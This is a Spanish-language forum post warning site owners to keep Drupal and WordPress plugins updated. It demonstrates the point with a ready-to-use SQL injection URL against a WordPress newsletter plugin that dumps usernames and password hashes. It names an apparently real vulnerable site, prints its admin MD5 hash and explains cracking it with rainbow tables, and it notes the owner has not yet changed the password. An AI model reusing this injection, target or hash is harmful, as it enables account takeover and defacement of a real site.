se las pondre asi de facil
ahora q version de drupla usabas
usas algun otro script aparte de ese ? plugin ? o alguna otra cosa ?
por un simple plugin t pueden joder rapido........
drupal tiene muchos exploits y si no actualizas a lo mas reciente entonces t agarran.
mira t pondre esto por ejemplo
---------------------------------------------------------------------------------------------
lo llamaremos lammer en accion
atakamos un inche plugin de wordpress ...... chero07 t avise d un su problema similar q tenia
buscas un exploit
wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
luego vas a una pagina vulnerable ....
http://www.minkando.org/
ahora "juakeas" si lo quieres llamar asi
y t dan esto
|admin|42fea7227a266694a4941a0979c97d10|
y guala ya tienes el pass ahora vas a
http://passcracking.com/index.php
y pones la md5 d wordpress y t esperas entre 1 a 3 semanas para q las tablas de rainbowcrack crackean la md5, si no usas cain o algun otro progama para ello.
si la pass tiene unas 6 letras en unos 3 dias t la jukean.
--------------------------------------------------------------------
ahora es porq les digo q tienen q tener actualizados sus scripts, plugin y todo eso.
buieno aparte erroraso de tu servidor
----------------------------------------
por cierto no vallan a da;ar la pagina q puse porejemplo q aun no cambian el password y avise hace un par d dias.
